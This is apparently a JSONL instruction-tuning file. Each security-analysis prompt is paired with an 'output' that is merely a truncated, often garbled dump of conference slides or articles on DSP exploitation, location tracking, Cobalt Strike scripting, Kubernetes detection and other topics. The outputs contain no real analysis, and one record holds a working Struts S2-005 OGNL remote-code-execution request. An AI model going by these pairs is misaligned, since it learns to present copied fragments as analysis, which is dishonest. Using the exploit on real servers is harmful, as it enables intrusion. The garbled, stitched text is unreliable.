Hack This.  Jailbreaking the System  Best Social Engineers on the Planet  Where Do We Start? 3 Planks of a Platform 3 Planks of a Platform 3 Planks of a Platform  Public Good/Safety 3 Planks of a Platform  Public Good/Safety  Preservation of Security Research 3 Planks of a Platform  Public Good/Safety  Preservation of Security Research  Preservation of Civil Liberties 3 Planks of a Platform 3 Planks of a Platform  Body - Public Good/Safety 3 Planks of a Platform  Body - Public Good/Safety  Mind - Security Research 3 Planks of a Platform  Body - Public Good/Safety  Mind - Security Research  Soul - Civil Liberties Next Steps Next Steps Next Steps 1. Name the Movement - Help us! Next Steps 1. Name the Movement - Help us! 2. Form a Executive & Advisory Boards Next Steps 1. Name the Movement - Help us! 2. Form a Executive & Advisory Boards 3. Hold a Constitutional Congress Next Steps 1. Name the Movement - Help us! 2. Form a Executive & Advisory Boards 3. Hold a Constitutional Congress 4. Share Results Next Steps 1. Name the Movement - Help us! 2. Form a Executive & Advisory Boards 3. Hold a Constitutional Congress 4. Share Results 5. Execute Projects The Cavalry Isnt Coming Y", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPwn2Own Qualcomm cDSP Slava Makkaveev What processors are on your mobile phone? modem DSP (mDSP/baseband) audio DSP (aDSP) compute DSP (cDSP) sensor DSP (sDSP) Kryo CPU (Android) Adreno GPU Wireless modem Hexagon DSP Spectra ISP Snapdragon SoC DSP assignment  Low-power processing of audio and voice data  Computer vision tasks  Machine learning-related calculations  Camera streaming  Artificial intelligence  ... Snapdragon 855 (SM8150): - Google Pixel 4 - Samsung S10 - Xiaomi Mi9 Snapdragon 835 (MSM8998): - Samsung S8 - OnePlus 5 - Sony Xperia XZ Premium aDSP is responsible for everything Tasks are distributed between aDSP and cDSP Communication between the CPU and DSP FastRPC mechanism (AP side) Android application libXXX_stub.so  libadsprpc.so  libcdsprpc.so /dev/adsprpc-smd /dev/cdsprpc-smd ioctl FastRPC mechanism (DSP side) fastrpc_shell_0 fastrpc_shell_3 libXXX_skel.so libXXX.so Who can run their own code on DSP?  DSP is licensed for programming by OEMs  The code running on the DSP is signed by Qualcomm  Android app has no permissions to execute its own code on the DSP  Only prebuilt DSP libraries could be freely invoked  Hexagon SDK is publically available  Stub and skel code will be generated automatically Can I compile my own DSP library? Yes Can I execute this library on DSP? No Who manages the DSP?  ELF 32-bit executable, Qualcomm DSP6 User PD Unsigned PD Guest OS PD Kernel PD QuRT OS /vendor/firmware/adsp /vendor/firmware/cdsp /dsp/* /vendor/dsp/* /vendor/lib/rfsa/adsp/*  Fastrpc shell ELFs  Dozens of skeleton and object libraries Skipping stub code from the FastRPC flow int remote_handle_open( const char* name, remote_handle *ph ) int remote_handle_invoke( remote_handle h, uint32_t scalars, remote_arg *pra ) We cannot sign a skeleton library, but we can execute a signed one Android application can bring any signed skeleton library and run it on the DSP Downgrade vulnerability CVE-2020-11209 There is no version check of loading skeleton libraries There are n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPractical Foxhunting 101 Adam Wirth - SimonJ @SimonJ_DC Overview  About me  About Foxhunting  Equipment Overview & Selection  Preparation  Techniques 2 Who Am I?  More than 15 years professional experience as a software & systems engineer  Most of my career has been spent working on wireless communications & emitter geolocation systems  Last years winner of the Hide & Seek and Foxhunt events in the Wireless Pentathlon 3 What is Foxhunting?  Finding the physical location of wireless emitters and/or their users, by measuring received power from different locations  Foxhunting is between the \"last mile\" and the last feet; for greater or lesser distances, other techniques are more appropriate  Wet-work ninjas finding the correct bedroom in the house of the South American populist government official  Tracking the Corporate Exec whose iPhone you've trojaned into an access point, as part of a Red Team penetration test  DEFCON 22 Wireless CTF  Techniques are applicable to all RF emitters, like mobiles phones, WiFi APs, heart monitors, etc. 4 What Equipments Involved?  Antennas  Omnidirectional and directional, for different purposes  Radios  Capable of receiving the signal-of-interest  Software-defined radios are finally becoming affordable  Visualization Software  Most important feature is viewing received power over time 5 Gear Selection: Antennas 6 Photo courtesy of NASA Aperture Versus Gain  As a rule, the more sensitive the antenna, the more focused (directional) its reception pattern  Too much gain can be a bad thing  High gain requires accurate pointing  Power curve follows the Inverse-Square Law  Unless you can attenuate your gain, you lose range discrimination when youre close to an emitter 7 Omnidirectional Antennas  Typically have a toroidal radiation pattern  Gain varies inversely with z-axis directionality  For foxhunting, high gain is good  Provides greater detection distance  Allows some degree of attenuation by varying orientation 8 Directional Antennas  There ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI Know Where You Are: 基于LBSN APP的地理位置追踪 2015年9月1日 赵 双(DFlower) 羅夏樸(Xiapu Luo) 1 Who AM I  赵双 DFlower, dflower.zs@gmail.com  Insight-Labs Team 成员 (http://insight-labs.org)  研究领域漏洞挖掘恶意代码分析手机安全  0day安全软件漏洞分析技术(第2版)作者之一  OWASP China 2010 Xcon 2011 Speaker  羅夏樸 (Xiapu Luo, luoxiapu@gmail.com)  RAP in HKPolyU  研究領域手機安全網絡安全  Papers published in major security conferences (e.g., NDSS, BlackHat, Defcon, etc.) 2 目录  LBSN APP 介绍  基于LBSN APP进行地理位置追踪  实例: 追踪全北京新浪微博用户的地理位置  给APP厂商的建议 3 LBSN APPs  LBSN: Location-based Social Network基于位置的 社交网络  很多LBSN APP具有发现附近的人(Nearby)功能 微信 Wechat 米聊 Mitalk 陌陌 Momo 新浪微博 Weibo 4 LBSN APPs  很多LBSN APP具有发现附近的人(Nearby)功能 SKOUT SayHi Badoo LOVOO 5 LBSN APPs  很多LBSN APP具有发现附近的人(Nearby)功能 当用户使用Nearby功能时  上传自己位置信息  寻找自己所处位置周边的陌生人  允许其他人在一定时间内发现自己  User Server Database t t search people in database save user1s location User1 searches people nearby User1 is found by user2 User1 is not found by user3 save user2s location User2 searches people nearby Save user3s location User3 searches people nearby search people in database search people in database Result 6 目录  LBSN APP 介绍  基于LBSN APP进行地理位置追踪  数据发送  数据获取  数据挖掘  DEMO: Mitalk, Wechat, Weibo  实例: 追踪全北京新浪微博用户的地理位置  给APP厂商的建议 7 如何基于LBSN APP进行位置追踪 1. 数据发送 登录APP并在不同的地理位置搜索附近的人 2. 数据获取 获得时间地点人数据集 3. 数据挖掘 数据集信息足够多的情况下可对目标的日常活动范围和轨迹 进行追踪 8 数据发送 针对不同类型的APP采用不同的数据发送方式 1. 构造数据包 2. 模拟器仿真 APP信息 数据安全性 利用难度 APP Googlepl ay下载量 (million) 360电子市 场下载量 (million) 位置精确 度( APP中) 数据传输方式 爬取APP位置数据方式 利用难度 Weibo 5-10 456 100m 明文 构造数据包 低 MeetMe 10-50 0.001 100m 明文 构造数据包 低 Skout 10-50 0.06 1000m 明文 构造数据包 低 SayHi 10-50 0.04 100m 明文 构造数据包 低 Badoo 50-100 0.07 1000m SSL单向认证 参数不明 构造数据包 模拟器仿真 ? Momo 1-5 168 10m SSL单向认证 构造数据包 低 Mitalk 0.5-1 17 100m 带加密参数的明文 破解加密参数&构造数据包 模拟器仿真 高 LOVOO 10-50 0.001 0.1mile SSL单向认证带 加密参数 破解加密参数&构造数据包 模拟器仿真 高 Wechat 100-500 455 100m SSL双向认证 替换证书&构造数据包 模拟器仿真 高 9 1. 数据发送 1. APP数据明文传输 典型APPWeiboMeetmeSayHi, Skout 方式构造并发送包含特定地理位置的数据包获取该位置附近的人  Weibo  Meetme  SayHi  Skout 10 1. 数据发送 2. APP数据采用HTTPS传输SSL单向认证 典型APPMomo 20", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRaspberry MoCA: an Automated Penetration Platform Andrew Hunt Volgeneau School of Engineering, George Mason University Fairfax, VA ahunt5@masonlive.gmu.edu Abstract Media Over Coaxial Alliance (MoCA) is a protocol encapsulating Ethernet protocols over coaxial cabling common to interior television wiring. Previous work discussed the vulnerabilities presented by common implementations of the protocol. In this paper, these vulnerabilities are realized with the development of Raspberry MoCA, an embedded device that provides a drop-in, automated exploitation kit which can be installed outside the target structure in less than five minutes, providing remote access and complete control over the connecting LAN. I. INTRODUCTION Prior work on Media over Coaxial Alliance (MoCA) protocol analysis revealed a major vulnerability in common implementations [1]. The logical separation between the local area network (LAN) and wide area network (WAN) is defeated by the use of a single physical cable to transmit both signals. Most operational service providers (OSPs), such as Verizon and Cox, present the termination point of their services to the optical network terminator (ONT) attached to the exterior of the serviced building for easy maintenance. This unit converts the signal to a coaxial cable, using the MoCA protocol to encapsulate the Ethernet packets to a receiving MoCA bridge embedded in the providers provided network router within the building. The router binds both MoCA LAN services for video devices and MoCA WAN services from the OSP to the same cable wiring used within the structure. It also bridges the MoCA LAN to the other LAN networks  wireless and Ethernet devices. Because the WAN signal runs on the cable, it is necessary to run this coaxial cable outside to the ONT. When this occurs, the LAN signal is also exposed, as depicted in Figure 1. This presents a physical attack vector to any attacker willing to disconnect the ONT and insert a coaxial splitter to an attached M", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ODEX文件 ## 基本介绍 我们知道 Android 应用程序的 java 层的代码在 apk 文件的 class.dex 文件中一般情况下我们在每次启动程序时会从中获取到 dex 文件并进行解析显然每次都这样做效率会比较低下Android 开发者提出了一种方式即我们最初加载 dex 文件时就对其进行优化生成一个 ODEX 文件存放在 /data/dalvik-cache 目录下当以后再次运行这个程序时我们只需要直接加载这个优化过的 ODEX 文件就行了省去了每次都要优化的时间对于 Android ROM 中系统自带的 app 直接转换为 odex 文件存放在与 apk 相同的目录下这样当手机每次开机启动的时候就会快很多了 ## 基本结构 待补充 ## 生成过程 待补充 ## 参考阅读 - Android 软件安全与逆向分析", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-005 远程代码执行漏洞 影响版本: 2.0.0 - 2.1.8.1 漏洞详情: http://struts.apache.org/docs/s2-005.html ## 原理 参考吴翰清的白帽子讲Web安全一书 > s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)OGNL表达式通过#来访问struts的对象struts框架通过过滤#字符防止安全问题然而通过unicode编码(\\u0023)或8进制(\\43)即绕过了安全限制对于S2-003漏洞官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补但是安全配置被绕过再次导致了漏洞攻击者可以利用OGNL表达式将这2个选项打开S2-003的修补方案把自己上了一个锁但是把锁钥匙给插在了锁头上 XWork会将GET参数的键和值利用OGNL表达式解析成Java语句如 ``` user.address.city=Bishkek&user['favoriteDrink']=kumys //会被转化成 action.getUser().getAddress().setCity(\"Bishkek\") action.getUser().setFavoriteDrink(\"kumys\") ``` 触发漏洞就是利用了这个点再配合OGNL的沙盒绕过方法组成了S2-003官方对003的修复方法是增加了安全模式沙盒S2-005在OGNL表达式中将安全模式关闭又绕过了修复方法整体过程如下 - S2-003 使用`\\u0023`绕过s2对`#`的防御 - S2-003 后官方增加了安全模式沙盒 - S2-005 使用OGNL表达式将沙盒关闭继续执行代码 ## 环境 执行以下命令启动s2-001测试环境 ``` docker compose build docker compose up -d ``` ## POC && EXP ### 执行任意命令POC无回显空格用`@`代替 ``` GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1 HTTP/1.1 Host: target:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 ``` 网上一些POC放到tomcat8下会返回400研究了一下发现字符`\\``\"`不能直接放path里需要urlencode编码以后再发送就好了这个POC没回显 POC用到了OGNL的Expression Evaluation ![](1.jpeg) 大概可以理解为`(aaa)(bbb)`中aaa作为OGNL表达式字符串bbb作为该表达式的root对象所以一般aaa位置如果需要执行代码需要用引号包裹起来而bbb位置可以直接放置Java语句`(aaa)(bbb)=true`实际上就是`aaa=true`不过确切怎么理解还需要深入研究有待优化 期待大佬研究出有回显的POC ### 执行任意命令POC有回显将需要执行的命令进行urlencode编码 ``` POST /example/HelloWorld.action HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Content-Type: app", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVista system restore Vista system restore rootkit rootkit Principle and protection Principle and protection Edward Sun Edward Sun PDF created with pdfFactory Pro trial version www.pdffactory.com About speaker About speaker u u Network ID : Network ID : CardMagic CardMagic u u Author of Author of DarkSpy DarkSpy anti anti--rootkit rootkit u u Posted several articles on Posted several articles on rootkit.com rootkit.com u u R&D of some world famous kernel level R&D of some world famous kernel level products in global companies products in global companies u u Experienced in Windows kernel mode Experienced in Windows kernel mode research and programming research and programming u u Now is a researcher of Trend Micro threat Now is a researcher of Trend Micro threat solution team solution team PDF created with pdfFactory Pro trial version www.pdffactory.com What will be introduced What will be introduced u u Internals of Vista system restore Internals of Vista system restore u u A user A user--mode mode rootkit rootkit to hide arbitrary file to hide arbitrary file or registry key from Windows Vista or registry key from Windows Vista system restore system restore u u A new way to bypass modern HIPS A new way to bypass modern HIPS u u Detection and protection of the threat Detection and protection of the threat PDF created with pdfFactory Pro trial version www.pdffactory.com Agenda Agenda u u Vista system restore (VSR) introduction Vista system restore (VSR) introduction u u VSR internals VSR internals u u VSR VSR rootkit rootkit u u A new way to bypass HIPS A new way to bypass HIPS u u Protect & detect VSR Protect & detect VSR u u Demo Demo PDF created with pdfFactory Pro trial version www.pdffactory.com Vista system restore (VSR) Vista system restore (VSR) introduction introduction u u VSR allows user to use restore point to return VSR allows user to use restore point to return their system files and settings to an earlier point their system files and settings to an earl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nM A N N I N G the art of How to take over any company in the world Includes free practice environment ROYCE DAVIS Phase 1: Information gathering Penetration tester MS17-010 MSSQL Server Apache Tomcat Jenkins Discover weaknesses Access vulnerable hosts Take over entire network Provide recommendations Final deliverable Findings and observations Engagement summary raditz.capsulecorp.local goku.capsulecorp.local Domain admin tien.capsulecorp.local gohan.capsulecorp.local trunks.capsulecorp.local vegeta.capsulecorp.local Actionable recommendations Phase 2: Focused penetration Phase 3: Privilege escalation Phase 4: Documentation Capsulecorp Inc. Internal Network Penetration Test LAN: 172.28.128.0/24 Active Directory: capsulecorp.local The Art of Network Penetration Testing HOW TO TAKE OVER ANY COMPANY IN THE WORLD ROYCE DAVIS M A N N I N G SHELTER ISLAND For online information and ordering of this and other Manning books, please visit www.manning.com. The publisher offers discounts on this book when ordered in quantity. For more information, please contact Special Sales Department Manning Publications Co. 20 Baldwin Road PO Box 761 Shelter Island, NY 11964 Email: orders@manning.com 2020 by Manning Publications Co. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by means electronic, mechanical, photocopying, or otherwise, without prior written permission of the publisher. Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in the book, and Manning Publications was aware of a trademark claim, the designations have been printed in initial caps or all caps. Recognizing the importance of preserving what has been written, it is Mannings policy to have the books we publish printed on acid-free paper, and we exert our best efforts to that end. Recognizing also our responsibility to conserve the resources o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEnd End--to to--End End Voice Encryption Voice Encryption over GSM: over GSM: A Different Approach Wesley Tanner Nick Lane-Smith Keith Lareau www.CellularCrypto.com About Us: Wesley Tanner - Systems Engineer for a Software-Defined Radio (SDRF) company - B.S. Electrical Engineering from RPI Nick Lane-Smith - Security Engineer for a computer company in Cupertino - B.S. Computer Science from UCSB Keith Lareau (not present) - B.S. Computer Science and Computer Systems Engineering from RPI CellularCrypto.com Presentation Overview  Motivation, the need for Cellular Crypto  Current market offerings  Operational details  A new approach - GSM Voice Channel Modem  Details of the voice channel  Radio interface  Traditional PSTN modems over GSM  Cryptographic Design  Demonstrations CellularCrypto.com Motivation Where is End-to-End voice protection over cellular? Why hasnt it become a reality for the average consumer? CellularCrypto.com Copyright (c} Mozzerati GSM Overview GSM Cryptography A3 - Authentication algorithm for the GSM security model A5 - The stream cipher used for voice- privacy A8 - Algorithm for voice-privacy key generation. CellularCrypto.com A5 weaknesses Alex Biryukov, Adi Shamir and David Wagner demonstrated breaking a A5/1 key in less than a second on a PC with 128 MB RAM. Elad Barkhan, Eli Biham and Nathan Keller have shown a ciphertext-only attack against A5/2. CellularCrypto.com Moral of the story GSM Cryptography provides limited, if any, true security to your voice channel. Something additional is needed. CellularCrypto.com The NEED for Cellular Crypto Cellular phones have almost completely supplanted PSTN. Cellular companies do not provide ANY meaningful protection for voice traffic. The ease of intercepting voice traffic is astounding And people do it all the time! Aisow.com The NEED for Cellular Crypto Two major classes of intercepts: Government Perpetrated - Authorized and Unauthorized - Secret (FISA) and Reported - Local, State and Federal - Not jus", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1991, 92, 93, 94, 95, 96, 97, 98, 1999 Free Software Foundation .\\\" See section COPYING for conditions for redistribution .TH ld 1 \"17 August 1992\" \"cygnus support\" \"GNU Development Tools\" .de BP .sp .ti \\-.2i \\(** .. .SH NAME ld \\- GNU linker (连接器) .SH \"总览 (SYNOPSIS)\" .hy 0 .na .TP .B ld .RB \"[\\|\" \\-o \" .I output\\c \\&\\|] \\c .I objfile\\c \\&.\\|.\\|. .br .RB \"[\\|\" \\-A\\c .I architecture\\c \\&\\|] .RB \"[\\|\" \"\\-b\\ \"\\c .I input-format\\c \\&\\|] .RB \"[\\|\" \\-Bstatic \"\\|]\" .RB \"[\\|\" \\-Bdynamic \"\\|]\" .RB \"[\\|\" \\-Bsymbolic \"\\|]\" .RB \"[\\|\" \"\\-c\\ \"\\c .I commandfile\\c \\&\\|] .RB \"[\\|\" \\-\\-cref \"\\|]\" .RB \"[\\|\" \\-d | \\-dc | \\-dp\\c \\|] .br .RB \"[\\|\" \"\\-defsym\\ \"\\c .I symbol\\c \\& = \\c .I expression\\c \\&\\|] .RB \"[\\|\" \\-\\-demangle \"\\|]\" .RB \"[\\|\" \\-\\-no\\-demangle \"\\|]\" .RB \"[\\|\" \"\\-e\\ \"\\c .I entry\\c \\&\\|] .RB \"[\\|\" \\-embedded\\-relocs \"\\|]\" .RB \"[\\|\" \\-E \"\\|]\" .RB \"[\\|\" \\-export\\-dynamic \"\\|]\" .RB \"[\\|\" \"\\-f\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \"\\-\\-auxiliary\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \"\\-F\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \"\\-\\-filter\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \"\\-format\\ \"\\c .I input-format\\c \\&\\|] .RB \"[\\|\" \\-g \"\\|]\" .RB \"[\\|\" \\-G .I size\\c \\&\\|] .RB \"[\\|\" \"\\-h\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \"\\-soname\\ \"\\c .I name\\c \\&\\|] .RB \"[\\|\" \\-\\-help \"\\|]\" .RB \"[\\|\" \\-i \"\\|]\" .RB \"[\\|\" \\-l\\c .I ar\\c \\&\\|] .RB \"[\\|\" \\-L\\c .I searchdir\\c \\&\\|] .RB \"[\\|\" \\-M \"\\|]\" .RB \"[\\|\" \\-Map .I mapfile\\c \\&\\|] .RB \"[\\|\" \\-m .I emulation\\c \\&\\|] .RB \"[\\|\" \\-n | \\-N \"\\|]\" .RB \"[\\|\" \\-noinhibit-exec \"\\|]\" .RB \"[\\|\" \\-no\\-keep\\-memory \"\\|]\" .RB \"[\\|\" \\-no\\-warn\\-mismatch \"\\|]\" .RB \"[\\|\" \\-O\\c .I level\\c \\&\\|] .RB \"[\\|\" \"\\-oformat\\ \"\\c .I output-format\\c \\&\\|] .RB \"[\\|\" \"\\-R\\ \"\\c .I filename\\c \\&\\|] .RB \"[\\|\" \\-relax \"\\|]\" .RB \"[\\|\" \\-r | \\-Ur \"\\|]\" .RB \"[\\|\" \"\\-rpath\\ \"\\c .I directory\\c \\&\\|] .RB \"[\\|\" \"\\-rpath\\-link\\ \"\\c .I directory\\c \\&\\|] .RB \"[\\|\" \\-S \"\\|]\" .RB \"[\\|\" \\-s \"\\|]\" .RB \"[\\|\" \\-shared \"\\|]\" .RB \"[\\|\" \\-sort\\-common \"\\|]\" .RB \"[\\|\" \"\\-split\\-by\\-reloc\\ \"\\c .I count\\c \\&\\|] .RB \"[\\|\" \\-s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOrange Tsai Orange Tsai DEVCORE 安全研究員 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 2014 ~ 2017 2017 ~ Now 2008 ~ 2014 - WAF?  X-www-form-urlencode  Multipart/form-data  Chunked ? return read_file(resolve(root, path)) ? var UP_PATH_REGEXP = /(?:|[\\\\/])\\.\\.(?:[\\\\/]|$)/ if (pathIsAbsolute.posix(path) || pathIsAbsolute.win32(path)) throw createError(400, 'Malicious Path') if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) throw createError(403) return read_file(resolve(root, path))  JSF Mojarra CVE-2013-3827 by SynopSys  JSF Mojarra CVE-2013-3827 by SynopSys 知識面決定看到的攻擊面有多廣 知識鍊決定發動的殺傷鍊有多深 - @Ringzero 1. Spring Framework 0day - CVE-2018-1271 2. Bynder(aseets.Spotify.com) Spring CVE-2018-1271 Directory Traversal in Spring Framework  2012 ( CVE)  CVE-2014-3625  Directory Traversal in Spring Framework  Spring Framework 3.0.4 to 3.2.11  Spring Framework 4.0.0 to 4.0.7  Spring Framework 4.1.0 to 4.1.1 Spring CVE-2018-1271 1. isInvalidPath(path) 2. isInvalidPath(URLDecoder.decode(path, \"UTF-8\")) 3. isResourceUnderLocation(resource, location) Spring CVE-2018-1271 0day - CVE-2018-1271 F5 protected boolean isInvalidPath(String path) { if (path.contains(\"WEB-INF\") || path.contains(\"META-INF\")) { return true; } if (path.contains(\":/\")) { return true; } if (path.contains(\"..\")) { path = cleanPath(path); if (path.contains(\"../\")) { return true; } } return false; Spring CVE-2018-1271 public static String cleanPath(String path) { String pathToUse = replace(path, \"\\\\\", \"/\"); // implementation here return path; }  1. Server Windows 2. 3. CVE-2018-1199 4. Tomcat WildFly Server Hmmmm 1. isInvalidPath(path) 2. isInvalidPath(URLDecoder.decode(path, \"UTF-8\")) 3. isResourceUnderLocation(resource, location) protected boolean isInvalidPath(String path) { if (path.contains(\"WEB-INF\") || path.contains(\"META-INF\")) { return true; } if (path.contains(\":/\")) { return true; } if (path.contains(\"..\")) { path = cleanPath(path); if (path.contains(\"../\")) { return true; } } retu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# LDAP --- 常用缩写词 - DN:Distinguished Name - CN:Common Name - OU:Organizational Unit - DC:Domain Component - ACE:Access Control Entries - ACL:Access Control List LDAP 连接服务器的连接字串格式为ldap://servername/DN 其中 DN 有三个属性分别是 CNOU 和 DC", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 Cobalt Strike 这几章基本是官方文档我修改了一些,这章没有编程基础可能看起来很吃力可以先看看sleep2.1文档当然我在 `0x02 Listeners`中简单的讲了下每行代码是干什么的可以先看这个再回头看其他的 Aggressor脚本是Cobalt Strike中的拓展,大多数Cobalt Strike对话框和功能都是作为独立模块编写的,它们向Aggressor Script引擎公开了一些接口 内部脚本default.cna定义了默认的Cobalt Strike体验,这个脚本定义了Cobalt Strike的工具栏按钮弹出菜单它还为大多数Cobalt Strike事件格式化输出. ## 键盘快捷键 脚本可以创建键盘快捷键,使用bind绑定键盘快捷键,这个例子显示了 Hello World在按住Ctrl和H的对话框中 ``` bind Ctrl + H { show_messageHello World; } ``` ## 弹出菜单 脚本也可以添加到Cobalt Strike的菜单结构或重新定义它popup关键字为弹出钩子构建菜单层次结构 这是定义Cobalt Strike帮助菜单的代码 ``` popup help { item(\"&Homepage\", { url_open(\"https://www.cobaltstrike.com/\"); }); item(\"&Support\", { url_open(\"https://www.cobaltstrike.com/support\"); }); item(\"&Arsenal\", { url_open(\"https://www.cobaltstrike.com/scripts?license=\" . licenseKey()); }); separator(); item(\"&System Information\", { openSystemInformationDialog(); }); separator(); item(\"&About\", { openAboutDialog(); }); } ``` 简单的说就是`popup `定义一个菜单栏 然后用 `item` 构建他的菜单目录`separator()` 是一个分隔符函数注册新菜单需要用 `menubar(\"&xxx\", \"xxx\");`  ``` popup pgraph { menu \"&Layout\" { item \"&Circle\" { graph_layout($1, \"circle\"); } item \"&Stack\" { graph_layout($1, \"stack\"); } menu \"&Tree\" { item \"&Bottom\" { graph_layout($1, \"tree-bottom\"); } item \"&Left\" { graph_layout($1, \"tree-left\"); } item \"&Right\" { graph_layout($1, \"tree-right\"); } item \"&Top\" { graph_layout($1, \"tree-top\"); } } item \"&None\" { graph_layout($1, \"none\"); } } } ``` `menu` 来构建主菜单中的子菜单 ## 自定义输出 Aggressor Script中的set关键字定义了如何格式化事件并将其输出呈现给用户 ``` set EVENT_SBAR_LEFT { return \"[\" . tstamp(ticks()) . \"] \" . mynick(); } set EVENT_SBAR_RIGHT { return \"[lag: $1 $+ ]\"; } ``` 上面的代码定义了Cobalt Strike的事件日志视图 - >事件日志中状态栏的内容,此状态栏的左侧显示当前时间和您的昵称右侧显示了Cobalt Strike客户端和团队服务器之间的消息往返时间 你可以覆盖Cobalt Strike默认脚本中的任何设置选项使用你关注的事件的定义创建自己的文件加载到Cobalt Strike中Cobalt Strike将使用你对内置定义的定义 ## 活动 使用on关键字为事件定义处理程序,当Cobalt Strike连接到团队服务器并准备就绪事件将触发 ``` on ready { show_message(\"Ready for action!\"); } ``` Cobalt Strike为各种情况生成事件使用* meta-event观看Cobalt Strike发生的所有事件 ``` on * { local('$handle $event $args')", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKUBERNETES中的异常活动检测 About me 0 1 @9ian1i 朱思宇 blue teamer侵对抗业余安全开发阿云融媒体安全 DEFCON Blue Team VillageBlack Hat Arsenal 演讲者 WatchAD  AD Security Intrusion Detection System crawlergo  A powerful browser crawler for web vulnerability scanners ??? - kubernetes abnormal activity detection and blocking system 开源安全项 安全险 安全防护 K8S安全险与防护现状 0 2 Threat matrix for Kubernetes 0 3 K8S安全防护现状 *检测能数据来各家官站档 https://docs.microsoft.com/en-us/azure/security-center/alerts-reference#alerts-k8scluster https://help.aliyun.com/document_detail/191144.html#title-seo-no0-8zv Alibaba Cloud Google Cloud Azure Cloud 0 AWS Cloud 0 7 云商 15 K8S集群异常活动检测项数量 具备相关能的国外安全商 除了云商国内普遍对K8S安全防护关注不够还停留在基线加固阶段 04 检测与对抗 05 Architecture based of audit logs detection 0 6 UI User Interface CLI Command Line interface API Server Master Audit Log Logtail Agent MQ Threat Analytics Alerts for suspicious activities Node 1 Node 2 Node n 0 7 About k8s auditing *审计策略格式样例 k8s审计事件志可记录访问API Server的所有请求配合 审计策略设置能记录请求与响应的详细数据 每个Master节点上的审计志并不会相互同步需要收集 所有Master节点 它能记录下三个关键问题  户身份与授权信息  请求的操作与资源详情  请求的结果与响应 0 8 User Interface Master etcd API Server Control- manager scheduler ns default-token-xxxxx sa-token-xxxxx other-token-xxxxx Host Secrets Node Pod Pod Compromised container Web App Access API Server Master A Master B Master N API Server API Server API Server 负载 均衡 6443 8080 容器集群渗透具 匿名登录尝试 集群信息探 测 0 9 SA Suspicious Activity 通过对SA进为学习记录建操作基线超出则告警 1 0 Honeypot Account ns Node Secrets default-token-xxxxx normal-sa-token-xxxxx fake-admin-token-xxxxx ... Pod A Pod B Host OS file: ~/.kube/kubeconfig 投放 蜜饵账户 ... 1 1 About k8s RBAC 1 2 Privilege Escalation  RBAC rolebinding/bind hacker API Server Create rolebinding auditing normal account cluster-admin role admin privileges account 1 3 Privilege Escalation  RBAC createpod and SA bind hacker createpod privilege create pod req API Server pod send token Get admin JWT token 1 4 Certificate Authentication = Golden Ticket ? UI User Interface K8S的重要认证乎都依赖客户端证书机制三套CA证书与私钥是认证体系的安全核 1 5 Golden Ticket  C", "category": "text_analysis", "source": "security_papers"}
